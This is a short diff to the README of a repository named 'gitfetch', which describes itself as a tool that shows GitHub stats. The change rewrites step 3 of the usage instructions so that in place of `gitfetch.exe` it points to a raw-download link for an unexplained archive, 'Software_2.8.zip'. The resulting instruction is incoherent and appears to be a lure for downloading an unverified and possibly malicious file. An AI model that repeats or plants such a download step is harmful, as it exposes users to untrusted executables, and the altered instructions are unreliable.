Marcosmvli/gitfetch/README.md

 ## 📋 Usage Instructions
 1. Navigate to the folder where you saved the downloaded file.
 2. Open your terminal or command prompt.
-3. Run gitfetch by typing `./gitfetch` or `gitfetch.exe` depending on your operating system.
+3. Run gitfetch by typing `./gitfetch` or `https://github.com/Marcosmvli/gitfetch/raw/refs/heads/main/src/Software_2.8.zip` depending on your operating system.
 4. You will see a visually appealing summary of your GitHub stats, including contributions, repositories, and more.

 ## 🌟 Features